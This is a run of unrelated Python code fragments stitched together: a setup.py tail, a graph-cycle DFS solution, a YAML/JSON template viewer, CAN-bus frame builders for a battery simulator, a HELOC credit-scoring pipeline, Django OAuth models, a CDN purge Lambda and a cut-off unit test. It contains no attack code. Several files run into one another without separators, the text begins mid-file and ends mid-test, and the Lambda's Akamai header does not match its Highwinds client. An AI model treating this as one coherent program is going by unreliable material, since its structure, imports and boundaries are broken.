{'Nuitka': ['Nuitka>=0.6.19.4,<0.7.0.0'],
 'cython': ['cython>=0.29.15,<0.30.0'],
 'pyinstaller': ['pyinstaller>=4.8,<5.0'],
 'pyoxidizer': ['pyoxidizer>=0.18.0,<0.19.0']}

# Console entry points installed as executables.
entry_points = \
{'console_scripts': ['monopoly = app:main',
                     'scriptopoly = install_monopoly:main']}

setup_kwargs = {
    'name': 'monopoly-probabilities',
    'version': '0.1.0',
    'description': 'Calculate the probabilties of landing on each different square on a monopoly board.',
    'long_description': None,
    'author': 'George Waters',
    'author_email': 'george@georgeh2os.com',
    'maintainer': None,
    'maintainer_email': None,
    'url': None,
    'packages': packages,
    'package_data': package_data,
    'extras_require': extras_require,
    'entry_points': entry_points,
    'python_requires': '>=3.7,<3.11',
}

# Opt-in native build: compile the Cython extension only when the
# BUILD_EXTENSION environment variable is set.
if os.getenv("BUILD_EXTENSION"):
    setup_kwargs.update(
        ext_modules = [Extension("app.cython_ext.monopoly", ["app/cython_ext/monopoly.cpp"])]
    )

setup(**setup_kwargs)
|
import sys
def dfs(v):
    """Follow the functional graph from `v`, appending any cycle found to `ans`.

    Walks graph[v] -> graph[graph[v]] -> ... recording the current path in the
    global list `tr` and marking nodes in the global `visit`. When the walk
    reaches an already-visited node that lies on the current path, every node
    from that point onward forms a cycle and is appended to the global `ans`.
    """
    global ans
    # Fixed: removed an unused `stack = [v]` local left over from an
    # abandoned iterative implementation.
    tr.append(v)
    w = graph[v]
    visit[v] = True
    if visit[w]:
        # w already seen: if it is on the current path, tr[a:] is a cycle.
        try:
            a = tr.index(w)
        except ValueError:
            # Narrowed from a bare `except:` — list.index only raises ValueError.
            a = -1
        if a != -1:
            ans += tr[a:]
    else:
        dfs(w)
# Allow deep recursion: dfs() recurses once per node along a path.
sys.setrecursionlimit(10**6)
# One functional graph per test case; the answer is the number of nodes
# that do NOT lie on any cycle.
t= int(sys.stdin.readline().rstrip("\n"))
for _ in range(t):
    n = int(sys.stdin.readline().rstrip("\n"))
    ans = []  # nodes that belong to some cycle (filled by dfs)
    graph = [0]*(n+1)  # graph[i] = successor of node i (1-indexed)
    arr = list(map(int,sys.stdin.readline().rstrip("\n").split(" ")))
    for k,c in enumerate(arr):
        graph[k+1] =c
    visit = [False for _ in range(n+1)]
    for i in range(1,n+1):
        if not visit[i]:
            tr = []  # current DFS path, shared with dfs() via module scope
            dfs(i)
    print(n-len(ans))
|
#import subprocess
import yaml
import pandas as p
import json as js
import os, sys
#cmd = "ls pageyml"
#res = os.system(cmd)
#res = subprocess.check_output(cmd.split(' ')).strip()
#print (res)
#sys.exit()
def mkspc(x, maxsp, sep=' '):
    """Return padding: `sep` repeated once per column needed to widen `x` to `maxsp`.

    Returns the empty string when `x` is already `maxsp` characters or longer.
    """
    padding = sep * (maxsp - len(x))
    return padding
def openfile(fname):
    """Read and return the entire contents of `fname` as text."""
    # Fixed: use a context manager so the handle is closed even if read()
    # raises (the original leaked the descriptor on error).
    with open(fname, 'r') as fp:
        return fp.read()
def view(fname, ftype='json'):
    """Load `fname` (JSON text or YAML) and print a structured summary of it.

    NOTE(review): the helpers `mkhdr`/`mkall` and the report calls below are
    reconstructed as nested inside this function — they reference the local
    `res`, so a module-level placement would raise NameError. Confirm against
    the upstream file.
    """
    res = openfile(fname)
    #if ftype == 'json':
    #    res = js.loads(res)
    if ftype == 'yaml':
        res = yaml.safe_load(res)

    def mkhdr(res, nsep=60, verbose=True):
        """Print a sorted name/type table for mapping `res`; return its sorted keys.

        Falls back to an index/type listing when `res` has no .keys()
        (i.e. it is a sequence rather than a mapping).
        """
        keys = ''
        try:
            keys = sorted(res.keys())
            #print('\n--------------------------------------------------------------------------------\n')
            #print(keys)
            li = [x.split('-') for x in keys]
            #print(li)
            dfli = p.DataFrame(li)
            dfli['name'] = keys

            def literalSortMap(dfli, column=0, literals=''):
                # Replace known literal values in `column` by their rank in
                # `literals`, so the later sort follows this domain ordering.
                vs = literals.split(' ')
                ks = list(range(0, len(vs)))
                #ks = [int(x) for x in '0 1 2 3 4 5 6 7 8 9 10'.split(' ')]
                smap = dict(zip(ks, vs))
                rsmap = dict(zip(vs, ks))
                #print(smap)
                #print(rsmap)
                #dfli[0] = [rsmap[x] for x in dfli[0]]
                for x in dfli.index:
                    try: dfli.loc[x,column] = rsmap[dfli.loc[x,column]]
                    except Exception as e: '' #print(e)
                return(dfli)

            # Apply the domain orderings most-significant column first.
            dfli = literalSortMap(dfli, column=0, literals='desktop tablet mobile')
            dfli = literalSortMap(dfli, column=0, literals='id name variant type master data template stylesheets context')
            dfli = literalSortMap(dfli, column=0, literals='header first second third fourth fifth sixth seventh eighth ninth footer')
            dfli = literalSortMap(dfli, column=1, literals='logo menu cart')
            dfli = literalSortMap(dfli, column=1, literals='column1 column2 column3 column4 column5')
            byl = [0,1] # list(range(0, 1))
            try: dfli = dfli.sort_values(by=byl)
            except Exception as e: '' #print(e)
            try:
                #print(' lenkeys: %s'%len(keys))
                keys = list(dfli['name'])
                #print('lenkeys[sorted]: %s'%len(keys))
            except Exception as e: print(e)
            li = []
            for i in keys:
                li.append(type(res[i]))
                #print('%s: %s %s' % (i, mkspc(i, nsep), type(res[i])))
            dfli['type'] = li
            dfli = dfli.loc[:, 'name type'.split(' ')].set_index('name')
            with p.option_context('display.max_rows', 4000, 'display.max_columns', 4000, 'display.width', 1000000):
                if verbose:
                    print(dfli)
                    print('')
            #print('\n++++++++++++++++++++++++++++++++++++++++\n')
            print('\n%s\n' % mkspc('', 40, sep='+'))
        except AttributeError as e:
            # res is not a mapping: list each element's index and type instead.
            #print(e)
            try:
                for i in range(len(res)): print('%s: %s %s' % (i, mkspc(i, 20), type(res[i])))
            except:
                ''
        return keys

    def mkall(o, title='Global', nsep=150, transpose=False, header=True):
        # Print a titled banner, a key/type header (via mkhdr), then `o`
        # rendered as a pandas DataFrame.
        #print('\n--------------------------------------------------------------------------------\n')
        print('\n---- %s %s %s\n' % (title, str(type(o)), mkspc('', (nsep-len(title)), sep='-')))
        #print(': %s %s' % (mkspc(o, 20), ))
        keys = mkhdr(o, verbose=header)
        try: df = p.DataFrame(o)
        except ValueError as e: df = p.DataFrame(o, index=[0])
        df = df.fillna('')
        try: df = df.loc[:, keys]
        except: ''
        if transpose: df = df.transpose()
        with p.option_context('display.max_rows', 4000, 'display.max_columns', 4000, 'display.width', 1000000):
            print(df)

    # Top-level report, then drill into the template tree.
    mkall(res)
    mkall(res['template'], 'template')
    o = res['template']['children']
    mkall(o, 'template children')
    for oi in range(len(o)):
        o2 = o[oi]['children']
        mkall(o2, 'template children %s children' % oi)
        for oi2 in range(len(o2)):
            try:
                o3 = o2[oi2]['data']
            except KeyError as e:
                print(e)
                #continue
                pass
            mkall(o3, 'template children %s children %s data' % (oi, oi2))
            for oi3 in range(len(o3)):
                try:
                    mkall(o3[oi3]['src'], 'template children %s children %s data %s src' % (oi, oi2, oi3))
                except KeyError as e:
                    #print(e)
                    ''
            for oi3 in range(len(o3)):
                try:
                    mkall(o3[oi3]['routes'], 'template children %s children %s data %s routes' % (oi, oi2, oi3))
                except KeyError as e:
                    #print(e)
                    ''
    #print('\n================================================================================================================================================================\n')
    print('\n%s\n' % mkspc('', 160, sep='='))
    transpose = True
    pheader = False
    # Per-breakpoint stylesheet summaries, transposed and without headers.
    #mkall(res['stylesheets'], 'stylesheets', nsep=150)
    mkall(res['stylesheets']['mobile'], 'stylesheets mobile', transpose=transpose, header=pheader)
    mkall(res['stylesheets']['tablet'], 'stylesheets tablet', transpose=transpose, header=pheader)
    mkall(res['stylesheets']['desktop'], 'stylesheets desktop', transpose=transpose, header=pheader)
if __name__ == "__main__":
    import argparse
    ## source: https://docs.python.org/2/howto/argparse.html
    parser = argparse.ArgumentParser()
    parser.add_argument("-v", '--view', help="viewjson", action="store_true")
    parser.add_argument("-sh", '--syntaxHighlight', help="syntax highlight", action="store_true")
    parser.add_argument("-f", '--file', help="filter index by")
    parser.add_argument("-t", '--type', help="json | yaml")
    args = parser.parse_args()
    if args.view:
        view(args.file, args.type)
    if args.syntaxHighlight:
        # https://stackoverflow.com/questions/9105031/how-to-beautify-json-in-python
        import sys
        import json
        from pygments import highlight, lexers, formatters
        res = openfile(args.file)
        formatted_json = json.dumps(json.loads(res))#, indent=4))
        # Fixed: `unicode` only exists on Python 2 and raised NameError here
        # on Python 3; pygments' highlight() accepts str directly.
        colorful_json = highlight(formatted_json, lexers.JsonLexer(), formatters.TerminalFormatter())
        print(colorful_json)
|
from struct import pack, unpack
from can import Message
def cell_V_set_1_4(box_id: int, cell_1_4_v: list[float]) -> Message:
    """
    Sets the Voltage Setpoints for Cells 1-4, range 0 to 5 V
    """
    try:
        arb_id = 160 + box_id  # Cell_Set_V_1_4 base ID plus the unit's box ID
        # "<4e": four little-endian half-precision floats, one per cell.
        v_data = pack("<4e", *cell_1_4_v)
        frame = Message(arbitration_id= arb_id,
                        data= v_data,
                        is_extended_id= False,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # NOTE(review): falls through and returns None on error — confirm callers handle it.
        print("Error generating Cell_Set_V_1_4 message:", e)
def cell_V_set_5_8(box_id: int, cell_5_8_v: list[float]) -> Message:
    """
    Sets the Voltage Setpoints for Cells 5-8, range 0 to 5 V
    """
    try:
        arb_id = 176 + box_id  # Cell_Set_V_5_8 base ID plus the unit's box ID
        # "<4e": four little-endian half-precision floats, one per cell.
        v_data = pack("<4e", *cell_5_8_v)
        frame = Message(arbitration_id= arb_id,
                        data= v_data,
                        is_extended_id= False,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # NOTE(review): falls through and returns None on error — confirm callers handle it.
        print("Error generating Cell_Set_V_5_8 message:", e)
def cell_V_set_9_12(box_id: int, cell_9_12_v: list[float]) -> Message:
    """
    Sets the Voltage Setpoints for Cells 9-12, range 0 to 5 V
    """
    try:
        arb_id = 192 + box_id  # Cell_Set_V_9_12 base ID plus the unit's box ID
        # "<4e": four little-endian half-precision floats, one per cell.
        v_data = pack("<4e", *cell_9_12_v)
        frame = Message(arbitration_id= arb_id,
                        data= v_data,
                        is_extended_id= False,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # NOTE(review): falls through and returns None on error — confirm callers handle it.
        print("Error generating Cell_Set_V_9_12 message:", e)
def hil_mode_trig(box_id: int, enable: bool) -> Message:
    """Build the CAN frame that starts or stops HIL mode on a BS1200.

    Parameters:
    --Box ID of the BS1200 unit
    --Enable/disable (True/False) trigger for data payload
    """
    try:
        payload = bytes([enable])  # single byte: 1 = start HIL mode, 0 = stop
        return Message(
            arbitration_id=128 + box_id,
            data=payload,
            is_extended_id=False,
            check=True,
            is_fd=False,
        )
    except ValueError as e:
        print("Error generating HIL mode trigger frame:", e)
        return None
def dio_set_1_8(box_id: int, dio_val: list[bool], dio_direction: list[bool]) -> Message:
    """Build the frame that sets DIO output values and pin directions (channels 1-8)."""
    try:
        # Fold each boolean list into a single bit-mask byte (channel 1 -> bit 0).
        value_mask = 0
        direction_mask = 0
        for bit, flag in enumerate(dio_val):
            if flag:
                value_mask |= 1 << bit
        for bit, flag in enumerate(dio_direction):
            if flag:
                direction_mask |= 1 << bit
        return Message(
            arbitration_id=512 + box_id,
            is_extended_id=False,
            data=bytearray([value_mask, direction_mask]),
            check=True,
            is_fd=False,
        )
    except ValueError as e:
        print("Error generating DIO Setpoints message:", e)
        return None
def ao_set_1_2(box_id: int, ao1_voltage: float, ao2_voltage: float) -> Message:
    """
    Generate message sent to configure
    the BS1200 analog output setpoints
    Voltage setpoints are valid in the range 0-5 Volts
    """
    try:
        arb_id = 544 + box_id
        # Each setpoint is a little-endian half-precision float ("<e").
        ao1 = pack("<e", ao1_voltage)
        ao2 = pack("<e", ao2_voltage)
        ao_payload = ao1 + ao2 + bytes(4) #pad payload with 4 empty bytes (as seen in CAN DB)
        frame = Message(arbitration_id = arb_id,
                        is_extended_id = False,
                        data = ao_payload,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        print("Error generating analog output setpoint message:", e)
        return None
def config(box_id: int, dio_hil_set_en: bool, ao_hil_set_en: bool, dio_hil_bcast_en: bool,
           ai_1_4_bcast_en: bool, ai_5_8_bcast_en: bool, cal_mode: bool) -> Message:
    """
    Generate a message to configure the Box Mode and Message Configuration

    The 24 flag bits are packed byte-wise: bits 0-7 into byte 1, bits 8-15
    into byte 2, bits 16-23 into byte 3 (bit 0 of each slice is the LSB).
    """
    try:
        arb_id = 1024 + box_id
        bool_array =[dio_hil_set_en, ao_hil_set_en, False, False, False, False, False, False, #Bits 0-7
                     dio_hil_bcast_en, ai_1_4_bcast_en, ai_5_8_bcast_en, False, False, False, False, False, #Bits 8-15
                     cal_mode, False, False, False, False, False, False, False] #Bits 16-23
        # Fixed: the slices previously stopped one element short ([0:7],
        # [8:15], [16:23]) and silently dropped bits 7, 15 and 23. Those bits
        # are constant False today, so behavior is unchanged, but the latent
        # off-by-one would corrupt the payload as soon as they were used.
        byte1 = sum(2**i for i, v in enumerate(bool_array[0:8]) if v)
        byte2 = sum(2**i for i, v in enumerate(bool_array[8:16]) if v)
        byte3 = sum(2**i for i, v in enumerate(bool_array[16:24]) if v)
        frame = Message(arbitration_id = arb_id,
                        is_extended_id = False,
                        data = bytes([byte1, byte2, byte3]),
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        print("Error generating message for box mode and message configuration:", e)
        return None
def cell_current_set_all(box_id, I_sink_all: int, I_source_all: int) -> Message:
    """
    Generates a message to set the source and sinking current for all cells
    """
    try:
        # NOTE(review): 1125 breaks the multiple-of-16 base-ID pattern used by
        # the other builders — confirm against the CAN database.
        arb_id = 1125 + box_id
        # Payload: sink then source, each a 2-byte little-endian unsigned int.
        curr_vals = I_sink_all.to_bytes(2, 'little')+I_source_all.to_bytes(2, 'little')
        frame = Message(arbitration_id= arb_id,
                        is_extended_id = False,
                        data = curr_vals,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        print("Error constructing cell current set all message:", e)
        return None
def cell_current_sink_setpoint(box_id, channel: int, I_sink: float) -> Message:
    """
    Generates a message to set the sink current of a single channel
    """
    try:
        arb_id = 1184 + box_id
        # NOTE(review): I_sink is annotated float, but .to_bytes exists only on
        # int — passing a real float raises AttributeError, which the ValueError
        # handler below does NOT catch. Confirm the intended argument type.
        sink_val = I_sink.to_bytes(2, 'little')
        # Payload: 0-based channel byte followed by the 2-byte current value.
        frame = Message(arbitration_id= arb_id,
                        is_extended_id = False,
                        data = bytes([channel-1])+sink_val,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        print("Error constructing set cell sinking current message:", e)
        return None
def cell_current_source_setpoint(box_id, channel: int, I_source: float) -> Message:
    """
    Generates a message to set the source current for a single channel

    Payload: the 1-based channel converted to a 0-based byte, followed by
    the 2-byte little-endian current value.
    """
    try:
        arb_id = 1200 + box_id
        # NOTE(review): I_source is annotated float, but .to_bytes exists only
        # on int — a real float raises AttributeError (not caught below).
        source_val = I_source.to_bytes(2, 'little')
        frame = Message(arbitration_id= arb_id,
                        is_extended_id = False,
                        data = bytes([channel-1])+source_val,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # Fixed: the format arguments must be one tuple. The original
        # `% channel, I_source, e` applied % to `channel` alone and raised
        # TypeError whenever this handler actually ran.
        print("Error constructing message to set cell %d to %f: %s" % (channel, I_source, e))
        return None
def cell_voltage_set_all(box_id, v_all: float) -> Message:
    """
    Generates a message to set the voltage value for all cells
    """
    try:
        arb_id = 1280 + box_id
        # Single little-endian half-precision float applied to every cell.
        volt_val = pack("<e", v_all)
        frame = Message(arbitration_id= arb_id,
                        is_extended_id = False,
                        data = volt_val,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # Fixed: the error text previously said "cell current set all"
        # (copy-paste from the current-setting helper).
        print("Error constructing cell voltage set all message:", e)
        return None
def cell_voltage_setpoint(box_id, channel: int, volt_val: float) -> Message:
    """
    Generates a message to set the voltage setpoint for a single channel

    (Docstring fixed: it previously said "source current", copy-pasted from
    the current-setting helper.)
    """
    try:
        arb_id = 1296 + box_id
        # Little-endian half-precision float ("<e").
        source_val = pack("<e", volt_val)
        # Payload: 0-based channel byte followed by the packed voltage.
        frame = Message(arbitration_id= arb_id,
                        is_extended_id = False,
                        data = bytes([channel-1])+source_val,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # Fixed: format arguments wrapped in a tuple — the original
        # `% channel, volt_val, e` raised TypeError inside this handler.
        print("Error constructing message to set cell %d to %f volts: %s" % (channel, volt_val, e))
        return None
def cell_enable_all(box_id: int, enable: bool) -> Message:
    """
    Generate message to enable or disable all cells
    """
    try:
        arb_id = 1344 + box_id
        # Single payload byte: 1 = enable all cells, 0 = disable all cells.
        frame = Message(arbitration_id = arb_id,
                        is_extended_id= False,
                        data = bytes([enable]),
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        print("Error constructing cell enable all message:", e)
        return None
def cell_enable(box_id: int, channel: int, enable: bool) -> Message:
    """
    Generate message to enable or disable a single cell

    Payload: 0-based channel byte followed by a 1/0 enable byte.
    """
    try:
        arb_id = 1360 + box_id
        frame = Message(arbitration_id = arb_id,
                        is_extended_id= False,
                        data = bytes([channel-1])+bytes([enable]),
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # Fixed: format arguments must be one tuple — the original
        # `% channel, e` passed `e` as a second print argument and raised
        # TypeError ("not enough arguments for format string").
        print("Error constructing cell enable message for channel %d: %s" % (channel, e))
        return None
def status(box_id: int) -> Message:
    """Build an empty status-request frame for the BS1200."""
    try:
        return Message(
            arbitration_id=256 + box_id,
            is_extended_id=False,
            check=True,
            is_fd=False,
        )
    except ValueError as e:
        print("Error constructing bs1200 status frame: ", e)
        return None
def cell_V_get_1_4(box_id: int) -> Message:
    """
    Generate frame to capture cell voltage readback for cells 1-4
    """
    try:
        arb_id = 288 + box_id  # Cell_V_Readback_1_4 base ID
        # Request-style frame: no data payload, the arbitration ID alone selects the readback.
        frame = Message(arbitration_id = arb_id,
                        is_extended_id= False,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # Implicitly returns None on failure (no explicit `return None`, unlike the setters).
        print("Error constructing Cell_V_Readback_1_4 frame", e)
def cell_V_get_5_8(box_id: int) -> Message:
    """
    Generate frame to capture cell voltage readback for cells 5-8
    """
    try:
        arb_id = 304 + box_id  # Cell_V_Readback_5_8 base ID
        frame = Message(arbitration_id = arb_id,
                        is_extended_id= False,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # Implicitly returns None on failure.
        print("Error constructing Cell_V_Readback_5_8 frame", e)
def cell_V_get_9_12(box_id: int) -> Message:
    """
    Generate frame to capture cell voltage readback for cells 9-12
    """
    try:
        arb_id = 320 + box_id  # Cell_V_Readback_9_12 base ID
        frame = Message(arbitration_id = arb_id,
                        is_extended_id= False,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # Implicitly returns None on failure.
        print("Error constructing Cell_V_Readback_9_12 frame", e)
def cell_I_get_1_4(box_id: int) -> Message:
    """
    Generate frame to capture cell current readback for cells 1-4
    """
    try:
        arb_id = 384 + box_id  # Cell_I_Readback_1_4 base ID
        frame = Message(arbitration_id = arb_id,
                        is_extended_id= False,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # Implicitly returns None on failure.
        print("Error constructing Cell_I_Readback_1_4 frame", e)
def cell_I_get_5_8(box_id: int) -> Message:
    """
    Generate frame to capture cell current readback for cells 5-8
    """
    try:
        arb_id = 400 + box_id  # Cell_I_Readback_5_8 base ID
        frame = Message(arbitration_id = arb_id,
                        is_extended_id= False,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # Implicitly returns None on failure.
        print("Error constructing Cell_I_Readback_5_8 frame", e)
def cell_I_get_9_12(box_id: int) -> Message:
    """
    Generate frame to capture cell current readback for cells 9-12
    """
    try:
        arb_id = 416 + box_id  # Cell_I_Readback_9_12 base ID
        frame = Message(arbitration_id = arb_id,
                        is_extended_id= False,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # Implicitly returns None on failure.
        print("Error constructing Cell_I_Readback_9_12 frame", e)
def dio_states_1_8(box_id: int) -> Message:
    """
    Generate frame to readback DIO States for channels 1 to 8
    """
    try:
        arb_id = 640 + box_id  # DIO_Readback_1_8 base ID
        frame = Message(arbitration_id = arb_id,
                        is_extended_id= False,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # Implicitly returns None on failure.
        print("Error constructing DIO_Readback_1_8 frame", e)
def ai_get_1_4(box_id: int) -> Message:
    """
    Generate frame to readback analog input channels 1 to 4
    """
    try:
        arb_id = 672 + box_id  # AI_Readback_1_4 base ID
        frame = Message(arbitration_id = arb_id,
                        is_extended_id= False,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # Implicitly returns None on failure.
        print("Error constructing AI_Readback_1_4 frame", e)
def ai_get_5_8(box_id: int) -> Message:
    """
    Generate frame to readback analog input channels 5 to 8
    """
    try:
        arb_id = 688 + box_id  # AI_Readback_5_8 base ID
        frame = Message(arbitration_id = arb_id,
                        is_extended_id= False,
                        check = True,
                        is_fd= False
                        )
        return frame
    except ValueError as e:
        # Implicitly returns None on failure.
        print("Error constructing AI_Readback_5_8 frame", e)
|
import pandas as pd
import numpy as np
from optbinning import BinningProcess
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.metrics import classification_report
from sklearn.metrics import auc, roc_auc_score, roc_curve
from sklearn.model_selection import train_test_split
from sklearn.pipeline import Pipeline
# Raw HELOC data; only the column names are used here.
# NOTE(review): `columns[1:]` implies the first column is the target — confirm.
raw_data = pd.read_csv('data/raw/heloc_dataset_v1.csv', delimiter=',')
variable_names = list(raw_data.columns[1:])

# Pre-split feature/target matrices produced by an earlier preprocessing step.
X_train = np.genfromtxt('data/preprocessed/X_train.csv', delimiter=',')
X_test = np.genfromtxt('data/preprocessed/X_test.csv', delimiter=',')
y_train = np.genfromtxt('data/preprocessed/y_train.csv', delimiter=',')
y_test = np.genfromtxt('data/preprocessed/y_test.csv', delimiter=',')

# Dataset sentinel codes for missing/invalid observations; binned separately.
special_codes = [-9, -8, -7]

# Per-variable monotonicity constraints for the optimal-binning step.
binning_fit_params = {
    "ExternalRiskEstimate": {"monotonic_trend": "descending"},
    "MSinceOldestTradeOpen": {"monotonic_trend": "descending"},
    "MSinceMostRecentTradeOpen": {"monotonic_trend": "descending"},
    "AverageMInFile": {"monotonic_trend": "descending"},
    "NumSatisfactoryTrades": {"monotonic_trend": "descending"},
    "NumTrades60Ever2DerogPubRec": {"monotonic_trend": "ascending"},
    "NumTrades90Ever2DerogPubRec": {"monotonic_trend": "ascending"},
    "PercentTradesNeverDelq": {"monotonic_trend": "descending"},
    "MSinceMostRecentDelq": {"monotonic_trend": "descending"},
    "NumTradesOpeninLast12M": {"monotonic_trend": "ascending"},
    "MSinceMostRecentInqexcl7days": {"monotonic_trend": "descending"},
    "NumInqLast6M": {"monotonic_trend": "ascending"},
    "NumInqLast6Mexcl7days": {"monotonic_trend": "ascending"},
    "NetFractionRevolvingBurden": {"monotonic_trend": "ascending"},
    "NetFractionInstallBurden": {"monotonic_trend": "ascending"},
    "NumBank2NatlTradesWHighUtilization": {"monotonic_trend": "ascending"}
}

binning_process = BinningProcess(variable_names, special_codes=special_codes,
                                 binning_fit_params=binning_fit_params)

# Scorecard-style pipeline: optimal binning followed by logistic regression.
clf_lr = Pipeline(steps=[('binning_process', binning_process),
                         ('classifier', LogisticRegression(solver='lbfgs'))])
clf_lr.fit(X_train, y_train)

y_pred = clf_lr.predict(X_test)
print(classification_report(y_test, y_pred))
|
from django.db import models
# Create your models here.
from django.utils.timezone import now
from Blog import settings
from account.models import BlogUser
class OauthUser(models.Model):
    """A third-party (OAuth) identity, optionally linked to a local blog user."""

    # Stored value / human-readable label pairs for `user_type`.
    user_alternative_type = (
        ("1","github"),
        ("2","google"),
    )
    # Local account this identity belongs to; nullable until the user links one.
    user = models.ForeignKey(settings.AUTH_USER_MODEL,on_delete=models.CASCADE,
                             null=True,blank=True)
    # Provider-side unique identifier.
    openid = models.CharField(default="",max_length=100,unique=True)
    user_type = models.CharField(max_length=20,choices=user_alternative_type)
    # verbose_name "昵称" = nickname.
    nickname = models.CharField(max_length=150,verbose_name="昵称")
    # NOTE(review): 'tocken' is a typo for 'token'; renaming the field would
    # require a schema migration, so it is documented rather than changed.
    tocken = models.CharField(max_length=255,blank=True,null=True)
    picture = models.CharField(max_length=150,blank=True,null=True)
    email = models.EmailField(max_length=50,default="")
    # verbose_name "创建时间" = creation time; "修改时间" = last-modified time.
    create_time = models.DateTimeField(verbose_name="创建时间",default=now)
    last_mod_time = models.DateTimeField(verbose_name="修改时间",default=now)

    def __str__(self):
        return self.nickname

    class Meta:
        verbose_name = "oauth用户"
        verbose_name_plural = verbose_name
        ordering = ["-create_time"]
class OauthConfig(models.Model):
    """Per-provider OAuth application credentials and callback settings."""

    user_alternative_type = (
        ("github","github"),
        ("google","google"),
    )
    type = models.CharField(max_length=150,choices=user_alternative_type,
                            default="github")
    app_key = models.CharField(max_length=200,verbose_name="AppKey")
    app_secret = models.CharField(max_length=200,verbose_name="AppSecret")
    # Where the provider redirects after authorization (verbose_name "回调地址" = callback address).
    callBack_url = models.URLField(max_length=255,verbose_name="回调地址",
                                   default="http://127.0.0.1:8000/")
    create_time = models.DateTimeField(verbose_name="创建时间", default=now)
    last_mod_time = models.DateTimeField(verbose_name="修改时间", default=now)
    is_enable = models.BooleanField(verbose_name="是否显示",default=True)

    class Meta:
        verbose_name = "oauth配置"
        verbose_name_plural = verbose_name
        ordering = ["-create_time"]
#
# (c) 2017 Shalom Carmel shalom@globaldots.com
#
# purge-akamai version 1
# https://api.ccu.akamai.com/ccu/v2/docs/
# Changelog
# version 1: Initial version
from __future__ import print_function
import os
import json
import logging
from highwindsclient import Highwinds
import config_highwinds as config
# Lambda has some special environment variables
# Lambda has some special environment variables
isLambda = True if "LAMBDA_RUNTIME_DIR" in os.environ else False

logger = logging.getLogger()
logger.setLevel(logging.INFO)

# These will only be loaded during Lambda cold start. Should this code be placed in the main function instead?
if isLambda:
    # On Lambda, credentials come from the function's environment configuration.
    password=os.environ.get('password')
    user=os.environ.get('user')
    base_url = os.environ.get('base_url')
else:
    # Local runs read the same settings from config_highwinds.py.
    password=config.password
    user=config.user
    base_url = config.base_url

# Fail fast at import time if any setting is missing.
# NOTE(review): `assert` is stripped under `python -O` — consider raising instead.
assert password,"Error: missing API password"
assert user, "Error: missing API user"
assert base_url, "Error: missing base URL"
def construct_url(base, bucket, key):
    """Return the CDN URL for an S3 object: `base` joined with `key`.

    `bucket` is accepted for signature compatibility but is not used —
    presumably the CDN origin is already pinned to one bucket via `base`.
    """
    return f'{base}/{key}'
def main(event, context=None):
    """Lambda entry point: purge the CDN URL of every S3 object in `event`.

    NOTE(review): the original indentation was ambiguous; this reading builds
    a Highwinds client per record but issues one batched purge after the loop
    (matching the "accumulate a batch" comment). Confirm against the deployed
    source.
    """
    output=[]
    url_list = []
    # accumulate a batch of URLs to purge
    for record in event['Records']:
        bucket = record['s3']['bucket']['name']
        key = record['s3']['object']['key']
        credentials = {
            'user' : user,
            'password' : password
        }
        highwinds = Highwinds(**credentials )
        cdn_url = construct_url(base_url, bucket, key)
        url_list.append(cdn_url)
    purge_response = highwinds.purge(url_list)
    purge_response_http_status = highwinds.http_status
    cdnEvent = {
        "url" : url_list,
        "highwinds_response" : {
            "status" : purge_response_http_status ,
            "response" : purge_response
        }
    }
    # The API can return 200 with an error body, so check both status and content.
    if purge_response_http_status != 200 or 'error' in highwinds.http_content.lower():
        logger.error('HTTP status: {} ; {}'.format(purge_response_http_status, json.dumps(cdnEvent) ) )
    else:
        logger.info(json.dumps(cdnEvent))
    output.append( cdnEvent )
    return(output)
if __name__ == '__main__':
    # Sample S3 "ObjectCreated:Put" event for exercising the handler locally.
    event = {
        "Records": [
            {
                "eventVersion": "2.0",
                "eventTime": "1970-01-01T00:00:00.000Z",
                "requestParameters": {
                    "sourceIPAddress": "127.0.0.1"
                },
                "s3": {
                    "configurationId": "testConfigRule",
                    "object": {
                        "eTag": "0123456789abcdef0123456789abcdef",
                        "sequencer": "0A1B2C3D4E5F678901",
                        "key": "HappyFace.jpg",
                        "size": 1024
                    },
                    "bucket": {
                        "arn": "arn:aws:s3:::mybucket",
                        "name": "mybucket",
                        "ownerIdentity": {
                            "principalId": "EXAMPLE"
                        }
                    },
                    "s3SchemaVersion": "1.0"
                },
                "responseElements": {
                    "x-amz-id-2": "EXAMPLE123/5678abcdefghijklambdaisawesome/mnopqrstuvwxyzABCDEFGH",
                    "x-amz-request-id": "EXAMPLE123456789"
                },
                "awsRegion": "us-east-1",
                "eventName": "ObjectCreated:Put",
                "userIdentity": {
                    "principalId": "EXAMPLE"
                },
                "eventSource": "aws:s3"
            }
        ]
    }
    print( main(event) )
import os
import shutil
from unittest import TestCase
from cookiejar.channel import Channel
from cookiejar.settings import SettingsReader
class ChannelTests(TestCase):
    """Integration tests for cookiejar's Channel add/remove against a local index."""

    def setUp(self):
        # Templates are installed under tests/cookiecutters, next to this file.
        self.current_dir = os.path.dirname(os.path.abspath(__file__))
        self.templates_dir = os.path.join(self.current_dir, 'cookiecutters')

    def test_add(self):
        config_path = os.path.join(self.current_dir, 'cookiejarrc')
        settings = SettingsReader(config_file=config_path)
        settings['templates_dir'] = self.templates_dir
